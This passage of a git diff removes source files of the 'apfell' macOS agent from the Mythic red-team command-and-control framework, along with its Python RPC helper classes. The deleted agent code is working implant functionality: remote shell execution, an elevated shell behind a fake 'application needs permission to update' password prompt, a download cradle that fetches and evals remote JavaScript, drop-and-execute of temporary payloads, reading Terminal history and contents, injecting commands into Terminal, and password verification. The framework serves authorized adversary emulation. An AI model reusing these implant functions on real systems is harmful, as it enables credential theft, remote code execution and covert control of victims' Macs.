"\nlogOutWhenInactive: " + secObj.logOutWhenInactive() + - "\nlogOutWhenInactiveInterval: " + secObj.logOutWhenInactiveInterval() + - "\nrequirePasswordToUnlock: " + secObj.requirePasswordToUnlock() + - "\nrequirePasswordToWake: " + secObj.requirePasswordToWake(); - //"\nsecureVirtualMemory: " + secObj.secureVirtualMemory(); //might need to be in an elevated context - return {"user_output":info, "completed": true}; - }catch(error){ - return {"user_output":error.toString(), "completed": true, "status": "error"}; - } -}; diff --git a/Payload_Types/apfell/agent_code/shell.js b/Payload_Types/apfell/agent_code/shell.js deleted file mode 100755 index 4bacb33cd..000000000 --- a/Payload_Types/apfell/agent_code/shell.js +++ /dev/null @@ -1,25 +0,0 @@ -exports.shell = function(task, command, params){ - //simply run a shell command via doShellScript and return the response - let response = ""; - try{ - let command_params = JSON.parse(params); - let command = command_params['command']; - if(command[command.length-1] === "&"){ - //doShellScript actually does macOS' /bin/sh which is actually bash emulating sh - // so to actually background a task, you need "&> /dev/null &" at the end - // so I'll just automatically fix this so it's not weird for the operator - command = command + "> /dev/null &"; - } - response = currentApp.doShellScript(command); - if(response === undefined || response === ""){ - response = "No Command Output"; - } - // shell output uses \r instead of \n or \r\n to line endings, fix this nonsense - response = response.replace(/\r/g, "\n"); - return {"user_output":response, "completed": true}; - } - catch(error){ - response = error.toString().replace(/\r/g, "\n"); - return {"user_output":response, "completed": true, "status": "error"}; - } -}; diff --git a/Payload_Types/apfell/agent_code/shell_elevated.js b/Payload_Types/apfell/agent_code/shell_elevated.js deleted file mode 100755 index 706e63d2f..000000000 --- 
a/Payload_Types/apfell/agent_code/shell_elevated.js +++ /dev/null @@ -1,52 +0,0 @@ -exports.shell_elevated = function(task, command, params){ - try{ - let response = ""; - let pieces = []; - let cmd = ""; - if(params.length > 0){ pieces = JSON.parse(params); } - else{ pieces = []; } - if(pieces.hasOwnProperty('command') && pieces['command'] !== ""){ - if(pieces['command'][command.length -1] === "&"){ - cmd = pieces['command'] + "> /dev/null &"; - }else{ - cmd = pieces['command']; - } - } - else{ - return {"user_output": "missing command", "completed": true, "status": "error"}; - } - let use_creds = false; - let prompt = "An application needs permission to update"; - if(pieces.hasOwnProperty('use_creds') && typeof pieces['use_creds'] === "boolean"){ use_creds = pieces['use_creds'];} - if(!use_creds){ - if(pieces.hasOwnProperty('prompt') && pieces['prompt'] !== ""){ prompt = pieces['prompt'];} - try{ - response = currentApp.doShellScript(cmd, {administratorPrivileges:true,withPrompt:prompt}); - } - catch(error){ - // shell output uses \r instead of \n or \r\n to line endings, fix this nonsense - response = error.toString().replace(/\r/g, "\n"); - return {"user_output":response, "completed": true, "status": "error"}; - } - } - else{ - let userName = apfell.user; - let password = ""; - if(pieces.hasOwnProperty('user') && pieces['user'] !== ""){ userName = pieces['user']; } - if(pieces.hasOwnProperty('credential')){ password = pieces['credential']; } - try{ - response = currentApp.doShellScript(cmd, {administratorPrivileges:true, userName:userName, password:password}); - } - catch(error){ - // shell output uses \r instead of \n or \r\n to line endings, fix this nonsense - response = error.toString().replace(/\r/g, "\n"); - return {"user_output":response, "completed": true, "status": "error"}; - } - } - // shell output uses \r instead of \n or \r\n to line endings, fix this nonsense - response = response.replace(/\r/g, "\n"); - return {"user_output":response, "completed": true}; - }catch(error){ - return {"user_output":error.toString(), "completed": true, "status": "error"}; - } -}; diff --git a/Payload_Types/apfell/agent_code/sleep.js b/Payload_Types/apfell/agent_code/sleep.js deleted file mode 100755 index e9b2fa780..000000000 --- a/Payload_Types/apfell/agent_code/sleep.js +++ /dev/null @@ -1,15 +0,0 @@ -exports.sleep = function(task, command, params){ - try{ - let command_params = JSON.parse(params); - if(command_params.hasOwnProperty('interval') && command_params['interval'] >= 0){ - C2.interval = command_params['interval']; - } - if(command_params.hasOwnProperty('jitter') && command_params['jitter'] >= 0 && command_params['jitter'] <= 100){ - C2.jitter = command_params['jitter']; - } - return {"user_output":"Sleep interval updated to " + C2.interval + " and sleep jitter updated to " + C2.jitter, "completed": true}; - }catch(error){ - return {"user_output":error.toString(), "completed": true, "status": "error"}; - } -}; - diff --git a/Payload_Types/apfell/agent_code/socks.js b/Payload_Types/apfell/agent_code/socks.js deleted file mode 100644 index 1887764e7..000000000 --- a/Payload_Types/apfell/agent_code/socks.js +++ /dev/null @@ -1,13 +0,0 @@ -exports.socks = function(task, command, params){ - let parameters = JSON.parse(params); - let data = {"socks": {} }; - if(parameters['action'] === 'start'){ - data['socks'] = {"start": parameters['port']} ; - }else{ - data['socks'] = {"stop": parameters['port']} ; - } - let resp = C2.postResponse(task, data); - return {"user_output": 
JSON.stringify(resp), "completed": true}; -}; - - \ No newline at end of file diff --git a/Payload_Types/apfell/agent_code/socks_send.js b/Payload_Types/apfell/agent_code/socks_send.js deleted file mode 100644 index 78a28e879..000000000 --- a/Payload_Types/apfell/agent_code/socks_send.js +++ /dev/null @@ -1,7 +0,0 @@ -exports.socks_send = function(task, command, params){ - //let parameters = JSON.parse(params); - let data = {"socks": {} }; - data['socks']['data'] = [{"server_id": 34567, "data": ""}]; - let resp = C2.postResponse(task, data); - return {"user_output": JSON.stringify(resp), "completed": true}; -}; diff --git a/Payload_Types/apfell/agent_code/spawn_download_cradle.js b/Payload_Types/apfell/agent_code/spawn_download_cradle.js deleted file mode 100755 index ec22dd6b7..000000000 --- a/Payload_Types/apfell/agent_code/spawn_download_cradle.js +++ /dev/null @@ -1,29 +0,0 @@ -exports.spawn_download_cradle = function(task, command, params){ - try{ - let config = JSON.parse(params); - if(!config.hasOwnProperty('url')){return {"user_output": "missing url parameter: 'a URL address where the jxa code is hosted'", "completed": true, "status": "error"};} - let full_url = config['url']; - let path = "/usr/bin/osascript"; - let args = ['-l','JavaScript','-e']; - let command = "eval(ObjC.unwrap($.NSString.alloc.initWithDataEncoding($.NSData.dataWithContentsOfURL($.NSURL.URLWithString("; - command = command + "'" + full_url + "')),$.NSUTF8StringEncoding)));"; - args.push(command); - args.push("&"); - try{ - let pipe = $.NSPipe.pipe; - let file = pipe.fileHandleForReading; // NSFileHandle - let task = $.NSTask.alloc.init; - task.launchPath = path; - task.arguments = args; - task.standardOutput = pipe; - task.standardError = pipe; - task.launch; - } - catch(error){ - return {"user_output":error.toString(), "completed": true, "status": "error"}; - } - return {"user_output":"Process spawned", "completed": true}; - }catch(error){ - return {"user_output":error.toString(), "completed": true, "status": "error"}; - } -}; diff --git a/Payload_Types/apfell/agent_code/spawn_drop_and_execute.js b/Payload_Types/apfell/agent_code/spawn_drop_and_execute.js deleted file mode 100755 index 961e2f27e..000000000 --- a/Payload_Types/apfell/agent_code/spawn_drop_and_execute.js +++ /dev/null @@ -1,39 +0,0 @@ -exports.spawn_drop_and_execute = function(task, command, params){ - let artifacts = []; - try{ - let config = JSON.parse(params); - //full_url = C2.baseurl + "api/v1.0/payloads/get/" + split_params[3]; - let m = [...Array(Number(10))].map(i=>(~~(Math.random()*36)).toString(36)).join(''); - let temp_file = "/tmp/" + m; - let file = C2.upload(task, config['template'], temp_file); - - let path = "/usr/bin/osascript"; - let result = write_data_to_file(file, temp_file); - if(result !== "file written"){return {"user_output": result, "completed": true, "status": 'error'};} - else{artifacts.push({"base_artifact": "File Create", "artifact": temp_file});} - let args = ['-l','JavaScript', temp_file, '&']; - try{ - let pipe = $.NSPipe.pipe; - let file = pipe.fileHandleForReading; // NSFileHandle - let task = $.NSTask.alloc.init; - task.launchPath = path; - task.arguments = args; - task.standardOutput = pipe; - task.standardError = pipe; - task.launch; - artifacts.push({"base_artifact": "Process Create", "artifact": "/usr/bin/osascript " + args.join(" ")}); - } - catch(error){ - return {"user_output":error.toString(), "completed": true, "status": "error", "artifacts": artifacts}; - } - //give the system time to actually 
execute the file before we delete it - $.NSThread.sleepForTimeInterval(3); - let fileManager = $.NSFileManager.defaultManager; - fileManager.removeItemAtPathError($(temp_file), $()); - return {"user_output": "Created temp file: " + temp_file + ", started process and removed file", "completed": true, "artifacts": artifacts}; - }catch(error){ - return {"user_output":error.toString(), "completed": true, "status": "error", "artifacts": artifacts}; - } -}; - - \ No newline at end of file diff --git a/Payload_Types/apfell/agent_code/system_info.js b/Payload_Types/apfell/agent_code/system_info.js deleted file mode 100755 index 4c1264adf..000000000 --- a/Payload_Types/apfell/agent_code/system_info.js +++ /dev/null @@ -1,7 +0,0 @@ -exports.system_info = function(task, command, params){ - try{ - return {"user_output":JSON.stringify(currentApp.systemInfo(), null, 2), "completed": true}; - }catch(error){ - return {"user_output":error.toString(), "completed": true, "status": "error"}; - } -}; diff --git a/Payload_Types/apfell/agent_code/terminals_read.js b/Payload_Types/apfell/agent_code/terminals_read.js deleted file mode 100755 index f8382c7d5..000000000 --- a/Payload_Types/apfell/agent_code/terminals_read.js +++ /dev/null @@ -1,54 +0,0 @@ -exports.terminals_read = function(task, command, params){ - let split_params = {}; - try{ - split_params = JSON.parse(params); - }catch(error){ - return {"user_output":error.toString(), "completed": true, "status": "error"}; - } - let all_data = {}; - try{ - let term = Application("Terminal"); - if(term.running()){ - let windows = term.windows; - for(let i = 0; i < windows.length; i++){ - let win_info = { - "Name": windows[i].name(), - "Visible": windows[i].visible(), - "Frontmost": windows[i].frontmost(), - "tabs": [] - }; - let all_tabs = []; - // store the windows information in id_win in all_data - all_data["window_" + i] = win_info; - for(let j = 0; j < windows[i].tabs.length; j++){ - let tab_info = { - "tab": j, - "Busy": windows[i].tabs[j].busy(), - "Processes": windows[i].tabs[j].processes(), - "Selected": windows[i].tabs[j].selected(), - "TTY": windows[i].tabs[j].tty() - }; - if(windows[i].tabs[j].titleDisplaysCustomTitle()){ - tab_info["CustomTitle"] = windows[i].tabs[j].customTitle(); - } - if(split_params['level'] === 'history'){ - tab_info["History"] = windows[i].tabs[j].history(); - } - if(split_params['level'] === 'contents'){ - tab_info["Contents"] = windows[i].tabs[j].contents(); - } - all_tabs.push(tab_info); - } - // store all of the tab information corresponding to that window id at id_tabs - win_info['tabs'] = all_tabs; - } - }else{ - return {"user_output":"Terminal is not running", "completed": true, "status": "error"}; - } - - }catch(error){ - return {"user_output":error.toString(), "completed": true, "status": "error"}; - } - let output = JSON.stringify(all_data, null, 2); - return {"user_output":output, "completed": true}; -}; diff --git a/Payload_Types/apfell/agent_code/terminals_send.js b/Payload_Types/apfell/agent_code/terminals_send.js deleted file mode 100755 index 3788e914b..000000000 --- a/Payload_Types/apfell/agent_code/terminals_send.js +++ /dev/null @@ -1,25 +0,0 @@ -exports.terminals_send = function(task, command, params){ - let split_params = {"window": 0, "tab": 0, "command": ""}; - try{ - split_params = Object.assign({}, split_params, JSON.parse(params)); - }catch(error){ - return {"user_output":error.toString(), "completed": true, "status": "error"}; - } - let output = "No Command Output"; - try{ - let term = 
Application("Terminal"); - if(term.running()){ - let window = split_params['window']; - let tab = split_params['tab']; - let cmd = split_params['command']; - term.doScript(cmd, {in:term.windows[window].tabs[tab]}); - output = term.windows[window].tabs[tab].contents(); - }else{ - return {"user_output":"Terminal is not running", "completed": true, "status": "error"}; - } - } - catch(error){ - return {"user_output":error.toString(), "completed": true, "status": "error"}; - } - return {"user_output":output, "completed": true}; -}; diff --git a/Payload_Types/apfell/agent_code/test_password.js b/Payload_Types/apfell/agent_code/test_password.js deleted file mode 100755 index 2c0e48255..000000000 --- a/Payload_Types/apfell/agent_code/test_password.js +++ /dev/null @@ -1,31 +0,0 @@ -exports.test_password = function(task, command, params){ - ObjC.import("OpenDirectory"); - let session = $.ODSession.defaultSession; - let sessionType = 0x2201 // $.kODNodeTypeAuthentication - let recType = $.kODRecordTypeUsers - let node = $.ODNode.nodeWithSessionTypeError(session, sessionType, $()); - let username = apfell.user; - let password = ""; - if(params.length > 0){ - let data = JSON.parse(params); - if(data.hasOwnProperty('username') && data['username'] !== ""){ - username = data['username']; - } - if(data.hasOwnProperty('password') && data['password'] !== ""){ - password = data['password']; - } - // if no password is supplied, try an empty password - } - let user = node.recordWithRecordTypeNameAttributesError(recType,$(username), $(), $()) - if(user.js !== undefined){ - if(user.verifyPasswordError($(password),$())){ - return {"user_output":"Successful authentication", "completed": true}; - } - else{ - return {"user_output":"Failed authentication", "completed": true}; - } - } - else{ - return {"user_output":"User does not exist", "completed": true, "status": "error"}; - } -}; diff --git a/Payload_Types/apfell/agent_code/upload.js b/Payload_Types/apfell/agent_code/upload.js deleted file mode 100755 index 31af6541a..000000000 --- a/Payload_Types/apfell/agent_code/upload.js +++ /dev/null @@ -1,32 +0,0 @@ -exports.upload = function(task, command, params){ - try{ - let config = JSON.parse(params); - let full_path = config['remote_path']; - let data = "Can't find 'file' or 'file_id' with non-blank values"; - let file_id = ""; - if(config.hasOwnProperty('file') && config['file'] !== ""){ - data = C2.upload(task, config['file'], ""); - file_id = config['file'] - } - if(typeof data === "string"){ - return {"user_output":String(data), "completed": true, "status": "error"}; - } - else{ - data = write_data_to_file(data, full_path); - try{ - let fm = $.NSFileManager.defaultManager; - let pieces = ObjC.deepUnwrap(fm.componentsToDisplayForPath(full_path)); - if(pieces === undefined){ - return {'status': 'error', 'user_output': String(data), 'completed': true}; - } - full_path = "/" + pieces.slice(1).join("/"); - }catch(error){ - return {'status': 'error', 'user_output': error.toString(), 'completed': true}; - } - return {"user_output":String(data), "completed": true, 'full_path': full_path, "file_id": file_id, - "artifacts": [{"base_artifact": "File Create", "artifact": full_path}]}; - } - }catch(error){ - return {"user_output":error.toString(), "completed": true, "status": "error"}; - } -}; diff --git a/Payload_Types/apfell/mythic/CommandBase.py b/Payload_Types/apfell/mythic/CommandBase.py deleted file mode 100644 index 6e949deb3..000000000 --- a/Payload_Types/apfell/mythic/CommandBase.py +++ /dev/null @@ -1,483 +0,0 @@ 
-from abc import abstractmethod, ABCMeta -import json -from enum import Enum -import base64 -import uuid -from pathlib import Path - - -class MythicStatus(Enum): - Success = "success" - Error = "error" - Completed = "completed" - Processed = "processed" - Processing = "processing" - - -class ParameterType(Enum): - String = "String" - Boolean = "Boolean" - File = "File" - Array = "Array" - ChooseOne = "Choice" - ChooseMultiple = "ChoiceMultiple" - Credential_JSON = "Credential-JSON" - Credential_Account = "Credential-Account" - Credential_Realm = "Credential-Realm" - Credential_Type = ("Credential-Type",) - Credential_Value = "Credential-Credential" - Number = "Number" - Payload = "PayloadList" - ConnectionInfo = "AgentConnect" - - -class CommandParameter: - def __init__( - self, - name: str, - type: ParameterType, - description: str = "", - choices: [any] = None, - required: bool = True, - default_value: any = None, - validation_func: callable = None, - value: any = None, - supported_agents: [str] = None, - ): - self.name = name - self.type = type - self.description = description - if choices is None: - self.choices = [] - else: - self.choices = choices - self.required = required - self.validation_func = validation_func - if value is None: - self.value = default_value - else: - self.value = value - self.default_value = default_value - self.supported_agents = supported_agents if supported_agents is not None else [] - - @property - def name(self): - return self._name - - @name.setter - def name(self, name): - self._name = name - - @property - def type(self): - return self._type - - @type.setter - def type(self, type): - self._type = type - - @property - def description(self): - return self._description - - @description.setter - def description(self, description): - self._description = description - - @property - def required(self): - return self._required - - @required.setter - def required(self, required): - self._required = required - - @property - def choices(self): - return self._choices - - @choices.setter - def choices(self, choices): - self._choices = choices - - @property - def validation_func(self): - return self._validation_func - - @validation_func.setter - def validation_func(self, validation_func): - self._validation_func = validation_func - - @property - def supported_agents(self): - return self._supported_agents - - @supported_agents.setter - def supported_agents(self, supported_agents): - self._supported_agents = supported_agents - - @property - def value(self): - return self._value - - @value.setter - def value(self, value): - if value is not None: - type_validated = TypeValidators().validate(self.type, value) - if self.validation_func is not None: - try: - self.validation_func(type_validated) - self._value = type_validated - except Exception as e: - raise ValueError( - "Failed validation check for parameter {} with value {}".format( - self.name, str(value) - ) - ) - return - else: - # now we do some verification ourselves based on the type - self._value = type_validated - return - self._value = value - - def to_json(self): - return { - "name": self._name, - "type": self._type.value, - "description": self._description, - "choices": "\n".join(self._choices), - "required": self._required, - "default_value": self._value, - "supported_agents": "\n".join(self._supported_agents), - } - - -class TypeValidators: - def validateString(self, val): - return str(val) - - def validateNumber(self, val): - try: - return int(val) - except: - return float(val) - - def validateBoolean(self, 
val): - if isinstance(val, bool): - return val - else: - raise ValueError("Value isn't bool") - - def validateFile(self, val): - try: # check if the file is actually a file-id - uuid_obj = uuid.UUID(val, version=4) - return str(uuid_obj) - except ValueError: - pass - return base64.b64decode(val) - - def validateArray(self, val): - if isinstance(val, list): - return val - else: - raise ValueError("value isn't array") - - def validateCredentialJSON(self, val): - if isinstance(val, dict): - return val - else: - raise ValueError("value ins't a dictionary") - - def validatePass(self, val): - return val - - def validateChooseMultiple(self, val): - if isinstance(val, list): - return val - else: - raise ValueError("Choices aren't in a list") - - def validatePayloadList(self, val): - return str(uuid.UUID(val, version=4)) - - def validateAgentConnect(self, val): - if isinstance(val, dict): - return val - else: - raise ValueError("Not instance of dictionary") - - switch = { - "String": validateString, - "Number": validateNumber, - "Boolean": validateBoolean, - "File": validateFile, - "Array": validateArray, - "Credential-JSON": validateCredentialJSON, - "Credential-Account": validatePass, - "Credential-Realm": validatePass, - "Credential-Type": validatePass, - "Credential-Credential": validatePass, - "Choice": validatePass, - "ChoiceMultiple": validateChooseMultiple, - "PayloadList": validatePayloadList, - "AgentConnect": validateAgentConnect, - } - - def validate(self, type: ParameterType, val: any): - return self.switch[type.value](self, val) - - -class TaskArguments(metaclass=ABCMeta): - def __init__(self, command_line: str): - self.command_line = str(command_line) - - @property - def args(self): - return self._args - - @args.setter - def args(self, args): - self._args = args - - def get_arg(self, key: str): - if key in self.args: - return self.args[key].value - else: - return None - - def has_arg(self, key: str) -> bool: - return key in self.args - - def get_commandline(self) -> str: - return self.command_line - - def is_empty(self) -> bool: - return len(self.args) == 0 - - def add_arg(self, key: str, value, type: ParameterType = None): - if key in self.args: - self.args[key].value = value - else: - if type is None: - self.args[key] = CommandParameter( - name=key, type=ParameterType.String, value=value - ) - else: - self.args[key] = CommandParameter(name=key, type=type, value=value) - - def rename_arg(self, old_key: str, new_key: str): - if old_key not in self.args: - raise Exception("{} not a valid parameter".format(old_key)) - self.args[new_key] = self.args.pop(old_key) - - def remove_arg(self, key: str): - self.args.pop(key, None) - - def to_json(self): - temp = [] - for k, v in self.args.items(): - temp.append(v.to_json()) - return temp - - def load_args_from_json_string(self, command_line: str): - temp_dict = json.loads(command_line) - for k, v in temp_dict.items(): - for k2,v2 in self.args.items(): - if v2.name == k: - v2.value = v - - async def verify_required_args_have_values(self): - for k, v in self.args.items(): - if v.value is None: - v.value = v.default_value - if v.required and v.value is None: - raise ValueError("Required arg {} has no value".format(k)) - - def __str__(self): - if len(self.args) > 0: - temp = {} - for k, v in self.args.items(): - if isinstance(v.value, bytes): - temp[k] = base64.b64encode(v.value).decode() - else: - temp[k] = v.value - return json.dumps(temp) - else: - return self.command_line - - @abstractmethod - async def parse_arguments(self): - pass - - -class 
AgentResponse: - def __init__(self, response: dict): - self.response = response - - -class Callback: - def __init__(self, **kwargs): - self.__dict__.update(kwargs) - - -class BrowserScript: - # if a browserscript is specified as part of a PayloadType, then it's a support script - # if a browserscript is specified as part of a command, then it's for that command - def __init__(self, script_name: str, author: str = None): - self.script_name = script_name - self.author = author - - def to_json(self, base_path: Path): - try: - code_file = ( - base_path - / "mythic" - / "browser_scripts" - / "{}.js".format(self.script_name) - ) - if code_file.exists(): - code = code_file.read_bytes() - code = base64.b64encode(code).decode() - else: - code = "" - return {"script": code, "name": self.script_name, "author": self.author} - except Exception as e: - return {"script": str(e), "name": self.script_name, "author": self.author} - - -class MythicTask: - def __init__( - self, taskinfo: dict, args: TaskArguments, status: MythicStatus = None - ): - self.task_id = taskinfo["id"] - self.original_params = taskinfo["original_params"] - self.completed = taskinfo["completed"] - self.callback = Callback(**taskinfo["callback"]) - self.agent_task_id = taskinfo["agent_task_id"] - self.operator = taskinfo["operator"] - self.args = args - self.status = MythicStatus.Success - if status is not None: - self.status = status - - def get_status(self) -> MythicStatus: - return self.status - - def set_status(self, status: MythicStatus): - self.status = status - - def __str__(self): - return str(self.args) - - -class CommandBase(metaclass=ABCMeta): - def __init__(self, agent_code_path: Path): - self.base_path = agent_code_path - self.agent_code_path = agent_code_path / "agent_code" - - @property - @abstractmethod - def cmd(self): - pass - - @property - @abstractmethod - def needs_admin(self): - pass - - @property - @abstractmethod - def help_cmd(self): - pass - - @property - @abstractmethod - def description(self): - pass - - @property - @abstractmethod - def version(self): - pass - - @property - @abstractmethod - def is_exit(self): - pass - - @property - @abstractmethod - def is_file_browse(self): - pass - - @property - @abstractmethod - def is_process_list(self): - pass - - @property - @abstractmethod - def is_download_file(self): - pass - - @property - @abstractmethod - def is_remove_file(self): - pass - - @property - @abstractmethod - def is_upload_file(self): - pass - - @property - @abstractmethod - def author(self): - pass - - @property - @abstractmethod - def argument_class(self): - pass - - @property - @abstractmethod - def attackmapping(self): - pass - - @property - def browser_script(self): - pass - - @abstractmethod - async def create_tasking(self, task: MythicTask) -> MythicTask: - pass - - @abstractmethod - async def process_response(self, response: AgentResponse): - pass - - def to_json(self): - params = self.argument_class("").to_json() - if self.browser_script is not None: - bscript = {"browser_script": self.browser_script.to_json(self.base_path)} - else: - bscript = {} - return { - "cmd": self.cmd, - "needs_admin": self.needs_admin, - "help_cmd": self.help_cmd, - "description": self.description, - "version": self.version, - "is_exit": self.is_exit, - "is_file_browse": self.is_file_browse, - "is_process_list": self.is_process_list, - "is_download_file": self.is_download_file, - "is_remove_file": self.is_remove_file, - "is_upload_file": self.is_upload_file, - "author": self.author, - "attack": [{"t_num": a} for a 
in self.attackmapping], - "parameters": params, - **bscript, - } diff --git a/Payload_Types/apfell/mythic/MythicBaseRPC.py b/Payload_Types/apfell/mythic/MythicBaseRPC.py deleted file mode 100644 index df92fe802..000000000 --- a/Payload_Types/apfell/mythic/MythicBaseRPC.py +++ /dev/null @@ -1,95 +0,0 @@ -from aio_pika import connect_robust, IncomingMessage, Message -import asyncio -import uuid -from CommandBase import * -import json - - -class RPCResponse: - def __init__(self, resp: dict): - self._raw_resp = resp - if resp["status"] == "success": - self.status = MythicStatus.Success - self.response = resp["response"] if "response" in resp else "" - self.error_message = None - else: - self.status = MythicStatus.Error - self.error_message = resp["error"] - self.response = None - - @property - def status(self): - return self._status - - @status.setter - def status(self, status): - self._status = status - - @property - def error_message(self): - return self._error_message - - @error_message.setter - def error_message(self, error_message): - self._error_message = error_message - - @property - def response(self): - return self._response - - @response.setter - def response(self, response): - self._response = response - - -class MythicBaseRPC: - def __init__(self, task: MythicTask): - self.task_id = task.task_id - self.connection = None - self.channel = None - self.callback_queue = None - self.futures = {} - self.loop = asyncio.get_event_loop() - - async def connect(self): - config_file = open("rabbitmq_config.json", "rb") - main_config = json.loads(config_file.read().decode("utf-8")) - config_file.close() - self.connection = await connect_robust( - host=main_config["host"], - login=main_config["username"], - password=main_config["password"], - virtualhost=main_config["virtual_host"], - ) - self.channel = await self.connection.channel() - self.callback_queue = await self.channel.declare_queue(exclusive=True) - await self.callback_queue.consume(self.on_response) - - return self - - def on_response(self, message: IncomingMessage): - future = self.futures.pop(message.correlation_id) - future.set_result(message.body) - - async def call(self, n, receiver: str = None) -> RPCResponse: - if self.connection is None: - await self.connect() - correlation_id = str(uuid.uuid4()) - future = self.loop.create_future() - - self.futures[correlation_id] = future - if receiver is None: - router = "rpc_queue" - else: - router = "{}_rpc_queue".format(receiver) - await self.channel.default_exchange.publish( - Message( - json.dumps(n).encode(), - content_type="application/json", - correlation_id=correlation_id, - reply_to=self.callback_queue.name, - ), - routing_key=router, - ) - - return RPCResponse(json.loads(await future)) diff --git a/Payload_Types/apfell/mythic/MythicC2RPC.py b/Payload_Types/apfell/mythic/MythicC2RPC.py deleted file mode 100644 index c43be2875..000000000 --- a/Payload_Types/apfell/mythic/MythicC2RPC.py +++ /dev/null @@ -1,29 +0,0 @@ -from MythicBaseRPC import * - - -class MythicC2RPCResponse(RPCResponse): - def __init__(self, resp: RPCResponse): - super().__init__(resp._raw_resp) - if resp.status == MythicStatus.Success: - self.data = resp.response - else: - self.data = None - - @property - def data(self): - return self._data - - @data.setter - def data(self, data): - self._data = data - - -class MythicC2RPC(MythicBaseRPC): - async def call_c2_func( - self, c2_profile: str, function_name: str, message: str - ) -> MythicC2RPCResponse: - resp = await self.call( - {"action": function_name, "message": 
message, "task_id": self.task_id}, - c2_profile, - ) - return MythicC2RPCResponse(resp) diff --git a/Payload_Types/apfell/mythic/MythicCryptoRPC.py b/Payload_Types/apfell/mythic/MythicCryptoRPC.py deleted file mode 100644 index 6a7673d17..000000000 --- a/Payload_Types/apfell/mythic/MythicCryptoRPC.py +++ /dev/null @@ -1,47 +0,0 @@ -from MythicBaseRPC import * -import base64 - - -class MythicCryptoRPCResponse(RPCResponse): - def __init__(self, resp: RPCResponse): - super().__init__(resp._raw_resp) - if resp.status == MythicStatus.Success: - self.data = resp.response["data"] - else: - self.data = None - - @property - def data(self): - return self._data - - @data.setter - def data(self, data): - self._data = data - - -class MythicCryptoRPC(MythicBaseRPC): - async def encrypt_bytes( - self, data: bytes, with_uuid: bool = False - ) -> MythicCryptoRPCResponse: - resp = await self.call( - { - "action": "encrypt_bytes", - "data": base64.b64encode(data).decode(), - "task_id": self.task_id, - "with_uuid": with_uuid, - } - ) - return MythicCryptoRPCResponse(resp) - - async def decrypt_bytes( - self, data: bytes, with_uuid: bool = False - ) -> MythicCryptoRPCResponse: - resp = await self.call( - { - "action": "decrypt_bytes", - "task_id": self.task_id, - "data": base64.b64encode(data).decode(), - "with_uuid": with_uuid, - } - ) - return MythicCryptoRPCResponse(resp) diff --git a/Payload_Types/apfell/mythic/MythicFileRPC.py b/Payload_Types/apfell/mythic/MythicFileRPC.py deleted file mode 100644 index 77388965e..000000000 --- a/Payload_Types/apfell/mythic/MythicFileRPC.py +++ /dev/null @@ -1,172 +0,0 @@ -from MythicBaseRPC import * -import base64 -import uuid - - -class MythicFileRPCResponse(RPCResponse): - def __init__(self, file: RPCResponse): - super().__init__(file._raw_resp) - if file.status == MythicStatus.Success: - self.agent_file_id = file.response["agent_file_id"] - self.task = file.response["task"] - self.timestamp = file.response["timestamp"] - self.deleted = file.response["deleted"] - self.operator = file.response["operator"] - self.delete_after_fetch = file.response["delete_after_fetch"] - self.filename = file.response["filename"] - self.md5 = file.response["md5"] - self.sha1 = file.response["sha1"] - self.chunks_received = file.response["chunks_received"] - self.total_chunks = file.response["total_chunks"] - if "contents" in file.response: - self.contents = base64.b64decode(file.response["contents"]) - else: - self.contents = None - else: - self.agent_file_id = None - self.task = None - self.timestamp = None - self.deleted = None - self.operator = None - self.delete_after_fetch = None - self.filename = None - self.md5 = None - self.sha1 = None - self.chunks_received = None - self.total_chunks = None - self.contents = None - - @property - def agent_file_id(self): - return self._agent_file_id - - @agent_file_id.setter - def agent_file_id(self, agent_file_id): - self._agent_file_id = agent_file_id - - @property - def task(self): - return self._task - - @task.setter - def task(self, task): - self._task = task - - @property - def timestamp(self): - return self._timestamp - - @timestamp.setter - def timestamp(self, timestamp): - self._timestamp = timestamp - - @property - def deleted(self): - return self._deleted - - @deleted.setter - def deleted(self, deleted): - self._deleted = deleted - - @property - def operator(self): - return self._operator - - @operator.setter - def operator(self, operator): - self._operator = operator - - @property - def delete_after_fetch(self): - return 
self._delete_after_fetch - - @delete_after_fetch.setter - def delete_after_fetch(self, delete_after_fetch): - self._delete_after_fetch = delete_after_fetch - - @property - def filename(self): - return self._filename - - @filename.setter - def filename(self, filename): - self._filename = filename - - @property - def md5(self): - return self._md5 - - @md5.setter - def md5(self, md5): - self._md5 = md5 - - @property - def sha1(self): - return self._sha1 - - @sha1.setter - def sha1(self, sha1): - self._sha1 = sha1 - - @property - def chunks_received(self): - return self._chunks_received - - @chunks_received.setter - def chunks_received(self, chunks_received): - self._chunks_received = chunks_received - - @property - def total_chunks(self): - return self._total_chunks - - @total_chunks.setter - def total_chunks(self, total_chunks): - self._total_chunks = total_chunks - - @property - def contents(self): - return self._contents - - @contents.setter - def contents(self, contents): - self._contents = contents - - -class MythicFileRPC(MythicBaseRPC): - async def register_file( - self, - file: bytes, - delete_after_fetch: bool = None, - saved_file_name: str = None, - remote_path: str = None, - is_screenshot: bool = None, - is_download: bool = None, - ) -> MythicFileRPCResponse: - resp = await self.call( - { - "action": "register_file", - "file": base64.b64encode(file).decode(), - "delete_after_fetch": delete_after_fetch - if delete_after_fetch is not None - else True, - "saved_file_name": saved_file_name - if saved_file_name is not None - else str(uuid.uuid4()), - "task_id": self.task_id, - "remote_path": remote_path if remote_path is not None else "", - "is_screenshot": is_screenshot if is_screenshot is not None else False, - "is_download": is_download if is_download is not None else False, - } - ) - return MythicFileRPCResponse(resp) - - async def get_file_by_name(self, filename: str) -> MythicFileRPCResponse: - resp = await self.call( - { - "action": "get_file_by_name", - "task_id": self.task_id, - "filename": filename, - } - ) - return MythicFileRPCResponse(resp) diff --git a/Payload_Types/apfell/mythic/MythicPayloadRPC.py b/Payload_Types/apfell/mythic/MythicPayloadRPC.py deleted file mode 100644 index 2af8bb3a1..000000000 --- a/Payload_Types/apfell/mythic/MythicPayloadRPC.py +++ /dev/null @@ -1,303 +0,0 @@ -from MythicBaseRPC import * -import base64 -import pathlib - - -class MythicPayloadRPCResponse(RPCResponse): - def __init__(self, payload: RPCResponse): - super().__init__(payload._raw_resp) - if payload.status == MythicStatus.Success: - self.uuid = payload.response["uuid"] - self.tag = payload.response["tag"] - self.operator = payload.response["operator"] - self.creation_time = payload.response["creation_time"] - self.payload_type = payload.response["payload_type"] - self.operation = payload.response["operation"] - self.wrapped_payload = payload.response["wrapped_payload"] - self.deleted = payload.response["deleted"] - self.auto_generated = payload.response["auto_generated"] - self.task = payload.response["task"] - if "contents" in payload.response: - self.contents = payload.response["contents"] - self.build_phase = payload.response["build_phase"] - self.agent_file_id = 